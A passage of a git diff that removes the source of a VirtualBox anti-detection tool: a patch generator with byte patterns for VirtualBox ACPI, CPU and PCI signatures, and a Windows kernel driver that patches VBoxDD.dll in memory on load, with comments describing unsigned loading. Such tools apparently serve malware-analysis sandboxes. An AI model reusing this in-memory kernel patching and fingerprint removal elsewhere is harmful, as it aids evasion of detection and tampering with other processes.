- cuiPrintText(LogBuffer, TRUE);
-
- if (SaveTable(DataBlocks, TEXT("\\output.bin"), c))
- uResult = 0;
- else
- uResult = (UINT)-2;
-
- } while (cond);
-
- if (usFileName.Buffer != NULL) {
- RtlFreeUnicodeString(&usFileName);
- }
-
- if (DllBase != NULL)
- NtUnmapViewOfSection(NtCurrentProcess(), DllBase);
-
- if (fh != NULL)
- NtClose(fh);
-
- if (sec != NULL)
- NtClose(sec);
-
- if (DataBlocks != NULL)
- RtlFreeHeap(GetProcessHeap(), 0, DataBlocks);
-
- return uResult;
-}
-
-/*
-* KasumiMain
-*
-* Purpose:
-*
-* Program entry point.
-*
-*/
-void KasumiMain(
- VOID
-)
-{
- BOOL cond = FALSE;
- UINT uResult = 0;
-
- __security_init_cookie();
-
- do {
-
- cuiInitialize(FALSE, NULL);
-
- SetConsoleTitle(T_PROGRAMTITLE);
-
- cuiPrintText(T_PROGRAMTITLE, TRUE);
-
- uResult = ProcessInputFile(GetCommandLine());
-
- switch (uResult) {
-
- case (UINT)-2:
- cuiPrintText(T_FILEOUTFAIL, TRUE);
-
- case (UINT)-1:
- cuiPrintText(TEXT("\r\nInput file not found"), TRUE);
- break;
-
- case 0: //success
- cuiPrintText(TEXT("\r\nOutput file generated"), TRUE);
- break;
-
- default:
- cuiPrintText(T_FILEINFAIL, FALSE);
- break;
- }
-
- } while (cond);
-
- ExitProcess(0);
-}
diff --git a/Source/Kasumi/VBoxPatchGen/patterns.h b/Source/Kasumi/VBoxPatchGen/patterns.h
deleted file mode 100644
index 3d35f03..0000000
--- a/Source/Kasumi/VBoxPatchGen/patterns.h
+++ /dev/null
@@ -1,132 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2017 - 2019
-*
-* TITLE: PATTERNS.H
-*
-* VERSION: 1.20
-*
-* DATE: 04 Jan 2019
-*
-* Search patterns and patches header file.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-
-#pragma once
-
-//patches
-
-static const unsigned char VBOX_PATCH[] = { 0x51, 0x52 };
-
-static const unsigned char JUSTVIRTUALBOX_PATCH[] = {
- 0x4D, 0x61, 0x67, 0x69, 0x63, 0x61, 0x6C, 0x52 };
-
-static const unsigned char CONFIGURATION_PATCH[] = {
- 0x44, 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74, 0x68, 0x00, 0x53,
- 0x73, 0x64, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x50, 0x61, 0x74, 0x68, 0x00, 0x00 };
-
-static const unsigned char HWID_PATCH_VIDEO_1[] = { 0xDE, 0x10 };
-
-static const unsigned char HWID_PATCH_VIDEO_2[] = { 0xED, 0x1C };
-
-static const unsigned char HWID_PATCH[] = { 0xCA, 0xC0 };
-
-//patterns
-
-static const unsigned char FACP_PATTERN[] = {
- 0xC7, 0x44, 0x24, 0x30, 0x56, 0x42, 0x4F, 0x58,
- 0x89, 0x45, 0x90, 0xC7, 0x44, 0x24, 0x34, 0x46,
- 0x41, 0x43, 0x50 };
-
-static const unsigned char RSDT_PATTERN[] = {
- 0xC7, 0x47, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7,
- 0x47, 0x14, 0x52, 0x53, 0x44, 0x54
-};
-
-static const unsigned char XSDT_PATTERN[] = {
- 0xC7, 0x43, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7,
- 0x43, 0x14, 0x58, 0x53, 0x44, 0x54
-};
-
-static const unsigned char APIC_PATTERN[] = {
- 0xC7, 0x40, 0x10, 0x56, 0x42, 0x4F, 0x58, 0xC7,
- 0x40, 0x14, 0x41, 0x50, 0x49, 0x43
-};
-
-static const unsigned char HPET_PATTERN[] = {
- 0xC7, 0x45, 0xD0, 0x56, 0x42, 0x4F, 0x58, 0x32,
- 0xD2, 0xC7, 0x45, 0xD4, 0x48, 0x50, 0x45, 0x54
-};
-
-static const unsigned char MCFG_PATTERN[] = {
- 0xC7, 0x45, 0xD0, 0x56, 0x42, 0x4F, 0x58, 0xFE,
- 0xC8, 0xC7, 0x45, 0xD4, 0x4D, 0x43, 0x46, 0x47
-};
-
-static const unsigned char VBOXCPU_PATTERN[] = {
- 0x48, 0xB8, 0x56, 0x42, 0x4F, 0x58, 0x43, 0x50,
- 0x55, 0x20
-};
-
-static const unsigned char JUSTVBOX_PATTERN[] = {
- 0x41, 0xC7, 0x01, 0x56, 0x42, 0x4F, 0x58, 0x66,
- 0xC7, 0x81, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01
-};
-
-static const unsigned char JUSTVIRTUALBOX_PATTERN[] = {
- 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42,
- 0x6F, 0x78, 0x00
-};
-
-static const unsigned char VIRTUALBOX2020_PATTERN[] = {
- 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42,
- 0x6F, 0x78, 0x20, 0x20, 0x00
-};
-
-static const unsigned char VIRTUALBOXGIM_PATTERN[] = {
- 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42,
- 0x6F, 0x78, 0x20, 0x47, 0x49, 0x4D, 0x20, 0x44,
- 0x65, 0x76, 0x69, 0x63, 0x65, 0x00
-};
-
-static const unsigned char VIRTUALBOXVMM_PATTERN[] = {
- 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x42,
- 0x6F, 0x78, 0x20, 0x56, 0x4D, 0x4D, 0x20, 0x44,
- 0x65, 0x76, 0x69, 0x63, 0x65, 0x0A, 0x00
-};
-
-static const unsigned char CFGSTRINGS_PATTERN[] = {
- 0x50, 0x61, 0x72, 0x61, 0x6C, 0x6C, 0x65, 0x6C,
- 0x30, 0x49, 0x72, 0x71, 0x00, 0x50, 0x61, 0x72,
- 0x61, 0x6C, 0x6C, 0x65, 0x6C, 0x31, 0x49, 0x72,
- 0x71, 0x00, 0x00
-};
- /*
-static const unsigned char CDROMVBOX_PATTERN[] = {
- 0x31, 0x2E, 0x30, 0x00, 0x43, 0x44, 0x2D, 0x52,
- 0x4F, 0x4D, 0x00, 0x00, 0x56, 0x42, 0x4F, 0x58,
- 0x00
-}; */
-
-static const unsigned char PCI80EE_PATTERN[] = {
- 0xB8, 0xEE, 0x80, 0x00, 0x00
-};
-
-static const unsigned char PCIBEEF_PATTERN[] = {
- 0xB8, 0xEF, 0xBE, 0x00, 0x00
-};
-
-static const unsigned char PCICAFE_PATTERN[] = {
- 0xB8, 0xFE, 0xCA, 0x00, 0x00
-};
-
-static const unsigned char HVID_PATTERN[] = {
- 0xC7, 0x40, 0xE8, 0x56, 0x42, 0x6F, 0x78, 0xC7,
- 0x40, 0xEC, 0x56, 0x42, 0x6F, 0x78, 0x48, 0xC7,
- 0x40, 0xF0, 0x56, 0x42, 0x6F, 0x78
-};
diff --git a/Source/Tsugumi/Tsugumi.sln b/Source/Tsugumi/Tsugumi.sln
deleted file mode 100644
index f73d58c..0000000
--- a/Source/Tsugumi/Tsugumi.sln
+++ /dev/null
@@ -1,28 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 14
-VisualStudioVersion = 14.0.25420.1
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Tsugumi", "Tsugumi.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|x64 = Debug|x64
- Release|x64 = Release|x64
- ReleaseSigned|x64 = ReleaseSigned|x64
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Debug|x64.ActiveCfg = Debug|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Debug|x64.Build.0 = Debug|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Debug|x64.Deploy.0 = Debug|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.ActiveCfg = Release|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Build.0 = Release|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.Release|x64.Deploy.0 = Release|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.ReleaseSigned|x64.ActiveCfg = ReleaseSigned|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.ReleaseSigned|x64.Build.0 = ReleaseSigned|x64
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}.ReleaseSigned|x64.Deploy.0 = ReleaseSigned|x64
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/Source/Tsugumi/Tsugumi.vcxproj b/Source/Tsugumi/Tsugumi.vcxproj
deleted file mode 100644
index e2b9632..0000000
--- a/Source/Tsugumi/Tsugumi.vcxproj
+++ /dev/null
@@ -1,191 +0,0 @@
-
-
-
-
- DebugBuild
- x64
-
-
- ReleaseSigned
- x64
-
-
- Debug
- x64
-
-
- Release
- x64
-
-
-
- {3D8146DE-8064-46C0-9E70-CEEC357B2290}
- {1bc93793-694f-48fe-9372-81e2b05556fd}
- v4.5
- 12.0
- Debug
- Win32
- Tsugumi
- 8.1
- Tsugumi
-
-
-
- Windowsv6.3
- true
- WindowsKernelModeDriver8.1
- Driver
- KMDF
- Universal
-
-
- Windowsv6.3
- false
- WindowsKernelModeDriver8.1
- Driver
- KMDF
- Universal
- true
-
-
- Windowsv6.3
- false
- WindowsKernelModeDriver8.1
- Driver
- KMDF
- Universal
- true
-
-
- Windowsv6.3
- false
- WindowsKernelModeDriver8.1
- Driver
- KMDF
- Universal
- true
-
-
-
-
-
-
-
-
-
-
- DbgengKernelDebugger
- AllRules.ruleset
- .\output\$(Platform)\$(Configuration)\
- .\output\$(Platform)\$(Configuration)\
-
-
- DbgengKernelDebugger
- AllRules.ruleset
- true
- .\output\$(Platform)\$(Configuration)\
- .\output\$(Platform)\$(Configuration)\
-
-
- DbgengKernelDebugger
- AllRules.ruleset
- true
- .\output\$(Platform)\$(Configuration)\
- .\output\$(Platform)\$(Configuration)\
-
-
- DbgengKernelDebugger
- AllRules.ruleset
- true
- .\output\$(Platform)\$(Configuration)\
- .\output\$(Platform)\$(Configuration)\
-
-
-
- false
- true
- Speed
- false
- true
- All
- true
- CompileAsC
- true
- true
-
-
- false
- false
- true
- true
- DriverEntry
- false
-
-
-
-
- false
- true
- Speed
- false
- true
- All
- true
- CompileAsC
- true
- true
- _SIGNED_BUILD;_DEBUGMSG;%(PreprocessorDefinitions)
-
-
- false
- true
- true
- true
- DriverEntry
- false
- /INTEGRITYCHECK %(AdditionalOptions)
-
-
- \Certs\SignTsugumi64.cmd .\output\$(Platform)\$(Configuration)\Tsugumi.sys
-
-
-
-
- false
- true
- Speed
- false
- true
- All
- true
- CompileAsC
- true
- true
- _DEBUGMSG;%(PreprocessorDefinitions)
-
-
- false
- false
- true
- true
- DriverEntry
- false
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/Source/Tsugumi/Tsugumi.vcxproj.user b/Source/Tsugumi/Tsugumi.vcxproj.user
deleted file mode 100644
index fb6baad..0000000
--- a/Source/Tsugumi/Tsugumi.vcxproj.user
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
- Off
-
-
- Off
-
-
- Off
-
-
\ No newline at end of file
diff --git a/Source/Tsugumi/main.c b/Source/Tsugumi/main.c
deleted file mode 100644
index 85e2d3c..0000000
--- a/Source/Tsugumi/main.c
+++ /dev/null
@@ -1,637 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2014 - 2017
-*
-* TITLE: MAIN.C
-*
-* VERSION: 1.82
-*
-* DATE: 20 Apr 2017
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-#include
-#include "main.h"
-
-#pragma warning(disable: 6102) //"Using %s from failed call at line %s"
-
-VBOX_PATCH g_VBoxDD;
-
-// Notify flag
-BOOLEAN g_NotifySet;
-
-// Data buffer
-static const WCHAR DDname[] = L"VBoxDD.dll";
-
-
-/*
-* TsmiHandleMemWrite
-*
-* Purpose:
-*
-* Patch vbox dll in memory.
-*
-* Warning: If compiled not in ReleaseSigned configuration this function is a
-* potential BSOD-generator due to nonstandard way of loading, take care with patch offsets.
-*
-*/
-NTSTATUS TsmiHandleMemWrite(
- _In_ PVOID SrcAddress,
- _In_ PVOID DestAddress,
- _In_ ULONG Size
-)
-{
- PMDL mdl;
- NTSTATUS status = STATUS_SUCCESS;
-
- PAGED_CODE();
-
- mdl = IoAllocateMdl(DestAddress, Size, FALSE, FALSE, NULL);
- if (mdl == NULL) {
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] Failed to create MDL at write\n");
-#endif
- return STATUS_INSUFFICIENT_RESOURCES;
- }
-
-#ifdef _SIGNED_BUILD
- __try {
-#endif //_SIGNED_BUILD
-
- if (DestAddress >= MmSystemRangeStart)
- if (!MmIsAddressValid(DestAddress)) {
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] Invalid address\n");
-#endif //_DEBUGMSG
- return STATUS_ACCESS_VIOLATION;
- }
- MmProbeAndLockPages(mdl, KernelMode, IoReadAccess);
- DestAddress = MmGetSystemAddressForMdlSafe(mdl, HighPagePriority);
- if (DestAddress != NULL) {
- status = MmProtectMdlSystemAddress(mdl, PAGE_EXECUTE_READWRITE);
- __movsb((PUCHAR)DestAddress, (const UCHAR *)SrcAddress, Size);
- MmUnmapLockedPages(DestAddress, mdl);
- MmUnlockPages(mdl);
- }
- else {
- status = STATUS_ACCESS_VIOLATION;
- }
-
-#ifdef _SIGNED_BUILD
- }
- __except (EXCEPTION_EXECUTE_HANDLER) {
- status = STATUS_ACCESS_VIOLATION;
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] MmProbeAndLockPages failed at write DestAddress = %p\n", DestAddress);
-#endif //_DEBUGMSG
- }
-#endif //_SIGNED_BUILD
-
- IoFreeMdl(mdl);
- return status;
-}
-
-/*
-* TsmiPatchImage
-*
-* Purpose:
-*
-* Iterate through patch chains and apply them all.
-*
-*/
-NTSTATUS TsmiPatchImage(
- _In_ VBOX_PATCH *PatchInfo,
- _In_ PIMAGE_INFO ImageInfo
-)
-{
- NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
- PBINARY_PATCH_BLOCK Chains;
- PKEY_VALUE_PARTIAL_INFORMATION PatchChains;
- ULONG l = 0;
-
- PAGED_CODE();
-
- if ((ImageInfo == NULL) || (PatchInfo == NULL))
- return ntStatus;
-
- KeWaitForSingleObject(&PatchInfo->Lock, Executive, KernelMode, FALSE, NULL);
-
- PatchChains = PatchInfo->Chains;
-
- if (PatchChains != NULL) {
- l = 0;
- Chains = (PBINARY_PATCH_BLOCK)&PatchChains->Data[0];
- while (l + BLOCK_DATA_OFFSET < PatchChains->DataLength) {
- if (Chains->DataLength != 0) {
- if ((Chains->VirtualOffset < ImageInfo->ImageSize) &&
- (Chains->VirtualOffset + Chains->DataLength < ImageInfo->ImageSize))
- {
- ntStatus = TsmiHandleMemWrite(Chains->Data, (PVOID)((ULONG_PTR)ImageInfo->ImageBase + Chains->VirtualOffset), Chains->DataLength);
- }
- }
- l += BLOCK_DATA_OFFSET + Chains->DataLength;
- Chains = (PBINARY_PATCH_BLOCK)((ULONG_PTR)Chains + BLOCK_DATA_OFFSET + Chains->DataLength);
- }
-
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] Image patch complete\n");
-#endif //_DEBUGMSG
- }
-
- KeReleaseMutex(&PatchInfo->Lock, FALSE);
-
- return ntStatus;
-}
-
-/*
-* TsmiPsImageHandler
-*
-* Purpose:
-*
-* Notify to catch VirtualBox dlls loading.
-*
-*/
-VOID TsmiPsImageHandler(
- _In_ PUNICODE_STRING FullImageName,
- _In_ HANDLE ProcessId,
- _In_ PIMAGE_INFO ImageInfo
-)
-{
- ULONG c, l = 0;
-
- PAGED_CODE();
-
- if ((FullImageName == NULL) || (ImageInfo == NULL) || (PsGetCurrentProcessId() != ProcessId))
- return;
-
- if ((FullImageName->Buffer == NULL) || (FullImageName->Length == 0))
- return;
-
- for (c = 0; c < (ULONG)FullImageName->Length / sizeof(WCHAR); c++)
- if (FullImageName->Buffer[c] == '\\')
- l = c + 1;
-
- //
- // Patch VBoxDD image.
- //
- if (_wcsnicmp(&FullImageName->Buffer[l], DDname, wcslen(DDname)) == 0) {
- if (NT_SUCCESS(TsmiPatchImage(&g_VBoxDD, ImageInfo))) {
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] DD patched\n");
-#endif
- }
- }
-}
-
-/*
-* TsmiListPatchChains
-*
-* Purpose:
-*
-* Output patch chains. DebugMsg only build.
-*
-*/
-VOID TsmiListPatchChains(
- _In_ KEY_VALUE_PARTIAL_INFORMATION *PatchChains
-)
-{
- ULONG l = 0;
- PBINARY_PATCH_BLOCK Chains;
-
- PAGED_CODE();
-
- DbgPrint("[TSMI] Patch chains -> %p\n", PatchChains);
-
- if (PatchChains == NULL)
- return;
-
- l = 0;
- Chains = (PBINARY_PATCH_BLOCK)&PatchChains->Data[0];
-
- DbgPrint("[TSMI] Chains->DataLength=%lx\n", PatchChains->DataLength);
-
- while (l + BLOCK_DATA_OFFSET < PatchChains->DataLength) {
- if (Chains->DataLength != 0) {
- DbgPrint("[TSMI] Chain->Offset: %lx, Chain->DataLength: %lx\n", Chains->VirtualOffset, Chains->DataLength);
- }
- l += BLOCK_DATA_OFFSET + Chains->DataLength;
- Chains = (PBINARY_PATCH_BLOCK)((ULONG_PTR)Chains + BLOCK_DATA_OFFSET + Chains->DataLength);
- }
-}
-
-/*
-* TsmiReadPatchChains
-*
-* Purpose:
-*
-* Read specified chains value from registry.
-*
-*/
-NTSTATUS TsmiReadPatchChains(
- _In_ HANDLE sKey,
- _In_ PUNICODE_STRING ParamName,
- _In_ VBOX_PATCH *PatchInfo
-)
-{
- KEY_VALUE_PARTIAL_INFORMATION keyinfo;
- ULONG ChainsLength = 0, bytesIO;
- NTSTATUS status;
-
- PAGED_CODE();
-
- if (sKey == NULL)
- return STATUS_INVALID_PARAMETER_1;
-
- if (ParamName == NULL)
- return STATUS_INVALID_PARAMETER_2;
-
- if (PatchInfo == NULL)
- return STATUS_INVALID_PARAMETER_3;
-
- status = ZwQueryValueKey(sKey, ParamName, KeyValuePartialInformation, &keyinfo, sizeof(KEY_VALUE_PARTIAL_INFORMATION), &ChainsLength);
- if (NT_SUCCESS(status)) {
- return STATUS_BUFFER_TOO_SMALL; // The key value is empty. It should not success with zero-length buffer if there are some data;
- }
-
- if ((status != STATUS_BUFFER_TOO_SMALL) && (status != STATUS_BUFFER_OVERFLOW)) {
- return status;
- }
-
- //
- // Allocate buffer for data with given size
- //
- PatchInfo->Chains = (PKEY_VALUE_PARTIAL_INFORMATION)ExAllocatePoolWithTagPriority(PagedPool,
- (SIZE_T)ChainsLength, TSUGUMI_TAG, NormalPoolPriority);
- if (PatchInfo->Chains == NULL)
- return STATUS_INSUFFICIENT_RESOURCES;
-
-
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] ChainsLength=%lx\n", ChainsLength);
-#endif //_DEBUGMSG
-
- RtlSecureZeroMemory(PatchInfo->Chains, ChainsLength);
- status = ZwQueryValueKey(sKey, ParamName, KeyValuePartialInformation, PatchInfo->Chains, ChainsLength, &bytesIO);
- if (NT_SUCCESS(status)) {
- PatchInfo->ChainsLength = ChainsLength;
-#ifdef _DEBUGMSG
- TsmiListPatchChains(PatchInfo->Chains);
-#endif //_DEBUGMSG
- }
-
- return status;
-}
-
-/*
-* TsmiCopyPatchChainsData
-*
-* Purpose:
-*
-* Copy/Refresh patch chains data to global variable.
-*
-*/
-VOID TsmiCopyPatchChainsData(
- _In_ VBOX_PATCH *Src,
- _In_ VBOX_PATCH *Dst
-)
-{
- PAGED_CODE();
-
- if ((Src == NULL) || (Dst == NULL))
- return;
-
- if ((Src->Chains == NULL) || (Src->ChainsLength == 0))
- return;
-
- KeWaitForSingleObject(&Dst->Lock, Executive, KernelMode, FALSE, NULL);
-
- if (Dst->Chains != NULL) {
- ExFreePoolWithTag(Dst->Chains, TSUGUMI_TAG);
- Dst->Chains = NULL;
- Dst->ChainsLength = 0;
- }
-
- Dst->Chains = Src->Chains;
- Dst->ChainsLength = Src->ChainsLength;
-
- KeReleaseMutex(&Dst->Lock, FALSE);
-}
-
-/*
-* TsmiLoadParameters
-*
-* Purpose:
-*
-* Read parameters from registry.
-*
-*/
-NTSTATUS TsmiLoadParameters(
- VOID
-)
-{
- UCHAR cond = 0;
- HANDLE hKey = NULL;
- NTSTATUS status = STATUS_UNSUCCESSFUL;
- UNICODE_STRING uStr;
- OBJECT_ATTRIBUTES ObjectAttributes;
- VBOX_PATCH tempPatch;
-
- PAGED_CODE();
-
- RtlInitUnicodeString(&uStr, TSUGUMI_PARAMS);
- InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE, NULL, NULL);
-
- status = ZwOpenKey(&hKey, KEY_READ, &ObjectAttributes);
- if (!NT_SUCCESS(status))
- return status;
-
- do {
- tempPatch.Chains = NULL;
- tempPatch.ChainsLength = 0;
-
- RtlInitUnicodeString(&uStr, DDname);
- status = TsmiReadPatchChains(hKey, &uStr, &tempPatch);
- if (NT_SUCCESS(status)) {
- TsmiCopyPatchChainsData(&tempPatch, &g_VBoxDD);
- }
- else {
- // VBoxDD must be always patched so return error if no patch data found.
- status = STATUS_UNSUCCESSFUL;
- break;
- }
-
- } while (cond);
-
- ZwClose(hKey);
- return status;
-}
-
-/*
-* DevioctlDispatch
-*
-* Purpose:
-*
-* IRP_MJ_DEVICE_CONTROL dispatch.
-*
-*/
-NTSTATUS DevioctlDispatch(
- _In_ struct _DEVICE_OBJECT *DeviceObject,
- _Inout_ struct _IRP *Irp
-)
-{
- NTSTATUS status = STATUS_SUCCESS;
- PIO_STACK_LOCATION stack;
- ULONG_PTR bytesIO = 0;
-
- UNREFERENCED_PARAMETER(DeviceObject);
-
- PAGED_CODE();
-
- stack = IoGetCurrentIrpStackLocation(Irp);
-
- if (stack != NULL) {
- switch (stack->Parameters.DeviceIoControl.IoControlCode) {
- case TSUGUMI_IOCTL_REFRESH_LIST:
-
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] DevioctlDispatch:TSUGUMI_IOCTL_REFRESH_LIST");
-#endif //_DEBUGMSG
-
- status = TsmiLoadParameters();
- if (g_NotifySet == FALSE) {
- if (NT_SUCCESS(status)) {
- status = PsSetLoadImageNotifyRoutine(TsmiPsImageHandler);
- if (NT_SUCCESS(status)) {
- g_NotifySet = TRUE;
-
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] DevioctlDispatch:NotifySet=%lx\n", g_NotifySet);
-#endif //_DEBUGMSG
-
- }
- }
- }
-
-#ifdef _DEBUGMSG
- else {
- DbgPrint("[TSMI] DevioctlDispatch:Notify already installed\n");
- }
-#endif //_DEBUGMSG
-
- bytesIO = g_NotifySet;
- break;
-
- case TSUGUMI_IOCTL_MONITOR_STOP:
-
- bytesIO = 0;
-
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] DevioctlDispatch:TSUGUMI_IOCTL_MONITOR_STOP");
-#endif //_DEBUGMSG
-
-
- if (g_NotifySet) {
- status = PsRemoveLoadImageNotifyRoutine(TsmiPsImageHandler);
- if (NT_SUCCESS(status)) {
- g_NotifySet = FALSE;
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] DevioctlDispatch:NotifySet=%lx\n", g_NotifySet);
-#endif //_DEBUGMSG
- bytesIO = 1;
- }
- }
- break;
-
- default:
- status = STATUS_INVALID_PARAMETER;
- };
- }
- else {
- status = STATUS_INTERNAL_ERROR;
- }
-
- Irp->IoStatus.Status = status;
- Irp->IoStatus.Information = bytesIO;
- IoCompleteRequest(Irp, IO_NO_INCREMENT);
- return status;
-}
-
-/*
-* UnsupportedDispatch
-*
-* Purpose:
-*
-* Unused IRP_MJ_* dispatch.
-*
-*/
-NTSTATUS UnsupportedDispatch(
- _In_ struct _DEVICE_OBJECT *DeviceObject,
- _Inout_ struct _IRP *Irp
-)
-{
- UNREFERENCED_PARAMETER(DeviceObject);
-
- PAGED_CODE();
-
- Irp->IoStatus.Status = STATUS_NOT_SUPPORTED;
- Irp->IoStatus.Information = 0;
- IoCompleteRequest(Irp, IO_NO_INCREMENT);
- return STATUS_NOT_SUPPORTED;
-}
-
-/*
-* CreateCloseDispatch
-*
-* Purpose:
-*
-* IRP_MJ_CREATE/IRP_MJ_CLOSE dispatch.
-*
-*/
-NTSTATUS CreateCloseDispatch(
- _In_ struct _DEVICE_OBJECT *DeviceObject,
- _Inout_ struct _IRP *Irp
-)
-{
- UNREFERENCED_PARAMETER(DeviceObject);
-
- PAGED_CODE();
-
- Irp->IoStatus.Status = STATUS_SUCCESS;
- Irp->IoStatus.Information = 0;
- IoCompleteRequest(Irp, IO_NO_INCREMENT);
- return STATUS_SUCCESS;
-}
-
-/*
-* DriverUnload
-*
-* Purpose:
-*
-* Driver unload procedure.
-*
-*/
-VOID DriverUnload(
- _In_ struct _DRIVER_OBJECT *DriverObject
-)
-{
- PAGED_CODE();
-
- UNICODE_STRING SymLink;
-
-#ifdef _DEBUGMSG
- DbgPrint("[TSMI] Unload, DrvObj = %p\n", DriverObject);
-#endif
-
- if (g_NotifySet) {
- PsRemoveLoadImageNotifyRoutine(TsmiPsImageHandler);
- }
-
- KeWaitForSingleObject(&g_VBoxDD.Lock, Executive, KernelMode, FALSE, NULL);
-
- if (g_VBoxDD.Chains) {
- ExFreePoolWithTag(g_VBoxDD.Chains, TSUGUMI_TAG);
- g_VBoxDD.Chains = NULL;
- g_VBoxDD.ChainsLength = 0;
- }
-
- KeReleaseMutex(&g_VBoxDD.Lock, FALSE);
-
- RtlInitUnicodeString(&SymLink, TSUGUMI_SYM_LINK);
- IoDeleteSymbolicLink(&SymLink);
- IoDeleteDevice(DriverObject->DeviceObject);
-}
-
-
-/*
-* DriverInitialize
-*
-* Purpose:
-*
-* Driver main.
-*
-*/
-NTSTATUS DriverInitialize(
- _In_ struct _DRIVER_OBJECT *DriverObject,
- _In_ PUNICODE_STRING RegistryPath
-)
-{
- NTSTATUS status;
- UNICODE_STRING SymLink, DevName;
- PDEVICE_OBJECT devobj;
- ULONG t;
-
- //RegistryPath is unused
- UNREFERENCED_PARAMETER(RegistryPath);
-
- g_NotifySet = FALSE;
-
- g_VBoxDD.Chains = NULL;
- g_VBoxDD.ChainsLength = 0;
- KeInitializeMutex(&g_VBoxDD.Lock, 0);
-
- RtlInitUnicodeString(&DevName, TSUGUMI_DEV_OBJECT);
- status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj);
- if (!NT_SUCCESS(status)) {
- return status;
- }
-
- RtlInitUnicodeString(&SymLink, TSUGUMI_SYM_LINK);
- status = IoCreateSymbolicLink(&SymLink, &DevName);
- if (!NT_SUCCESS(status)) {
- IoDeleteDevice(devobj);
- return status;
- }
-
- devobj->Flags |= DO_BUFFERED_IO;
- for (t = 0; t <= IRP_MJ_MAXIMUM_FUNCTION; t++)
- DriverObject->MajorFunction[t] = &UnsupportedDispatch;
-
- DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = &DevioctlDispatch;
- DriverObject->MajorFunction[IRP_MJ_CREATE] = &CreateCloseDispatch;
- DriverObject->MajorFunction[IRP_MJ_CLOSE] = &CreateCloseDispatch;
-
-#ifndef _SIGNED_BUILD
- DriverObject->DriverUnload = NULL;
- devobj->Flags &= ~DO_DEVICE_INITIALIZING;
-#else
- DriverObject->DriverUnload = &DriverUnload;
- status = TsmiLoadParameters();
- if (NT_SUCCESS(status)) {
- status = PsSetLoadImageNotifyRoutine(TsmiPsImageHandler);
- if (NT_SUCCESS(status)) {
- g_NotifySet = TRUE;
- }
- }
-#endif
- return STATUS_SUCCESS;
-}
-
-/*
-* DriverEntry
-*
-* Purpose:
-*
-* Tsugumi entry point.
-*
-*/
-NTSTATUS DriverEntry(
- _In_ struct _DRIVER_OBJECT *DriverObject,
- _In_ PUNICODE_STRING RegistryPath
-)
-{
-#ifndef _SIGNED_BUILD
- UNICODE_STRING drvName;
-
- UNREFERENCED_PARAMETER(DriverObject);
- UNREFERENCED_PARAMETER(RegistryPath);
-
- RtlInitUnicodeString(&drvName, TSUGUMI_DRV_OBJECT);
- return IoCreateDriver(&drvName, &DriverInitialize);
-#else
- return DriverInitialize(DriverObject, RegistryPath);
-#endif
-}
diff --git a/Source/Tsugumi/main.h b/Source/Tsugumi/main.h
deleted file mode 100644
index c7448c6..0000000
--- a/Source/Tsugumi/main.h
+++ /dev/null
@@ -1,110 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2016 - 2017
-*
-* TITLE: MAIN.H
-*
-* VERSION: 1.82
-*
